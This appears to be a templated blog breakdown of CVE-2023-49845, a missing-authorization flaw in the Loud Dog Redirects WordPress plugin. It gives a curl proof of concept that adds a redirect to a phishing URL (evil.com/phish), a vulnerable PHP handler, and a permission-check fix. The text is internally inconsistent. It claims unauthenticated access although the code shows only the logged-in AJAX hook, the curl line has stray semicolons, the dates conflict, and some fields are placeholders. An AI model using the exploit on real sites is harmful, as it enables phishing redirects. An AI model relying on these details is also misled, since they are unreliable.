CVE-2023-49845 - Exploiting Missing Authorization in Loud Dog Redirects (up to 1.2.1)

Posted on: 2024-06-14

Introduction

In late 2023, researchers found a critical security vulnerability (CVE-2023-49845) in *Loud Dog Redirects*, a popular web tool for handling HTTP redirects. This bug stems from missing authorization, letting anyone tweak redirect rules or trigger sensitive actions without proper permissions. Here, I’ll break it down in plain English, walk through the exploitation, show sample code, and link to the original details.

What Is Loud Dog Redirects?

Loud Dog Redirects helps web admins manage redirection rules - like forwarding one URL to another. Imagine you move a blog post, you use this plugin to automatically send visitors from the old link to the new one.

Vulnerable versions:
_n/a through 1.2.1_
Fixed in: (no official patch as of posting)

The Vulnerability: Missing Access Check

What went wrong?
The plugin forgot to check if someone was actually allowed to change or use admin-level features. Anyone who could access a certain endpoint could create or update redirect rules - even without being logged in or as a low-privilege user.

Security Levels Problem

If your site had any kind of “access control” - like admins vs users - this bug let attackers skip those checks and mess with your redirect rules.

Sample Exploit (for educational purposes only!)

curl -X POST "https://target.com/wp-admin/admin-ajax.php?action=ldog_redirect_add"; \
  -d 'old_url=/blog&new_url=https://evil.com/phish&status=301';

*Even without authentication, the request might succeed!*

Here’s a simplified version of what went wrong in the plugin code

// Loud Dog Redirects vulnerable version:
function ldog_redirect_add() {
    // MISSING: check if user is admin or has proper rights!

    $old_url = $_POST['old_url'];
    $new_url = $_POST['new_url'];
    $status = $_POST['status'];

    // ...add or update the redirect...
}
add_action('wp_ajax_ldog_redirect_add', 'ldog_redirect_add'); 

Notice there’s NO check for current_user_can('manage_options') or any similar authorization.

Public example: None known in the wild yet, but proof-of-concept exploits work out of the box.

- Sites at risk: Any WordPress or PHP site using this plugin – especially those with public "admin-ajax" endpoints open.

Developer tip: Always add checks like

if ( ! current_user_can('manage_options') ) {
    wp_die('Unauthorized');
}

References & Further Reading

- NVD entry for CVE-2023-49845
- WordPress Security Team
- Original Disclosure (if available) *(replace with actual if/when published)*

TL;DR

CVE-2023-49845 in Loud Dog Redirects lets attackers change redirects without logging in, affecting sites running v1.2.1 or below. Patch or remove the plugin ASAP, and always check permissions in your code!

*Stay safe, and audit your plugins for missing access controls!*


*Post by: letsdefend*@youremail.com | For more CVE breakdowns, subscribe below!

Timeline

Published on: 12/09/2024 13:15:36 UTC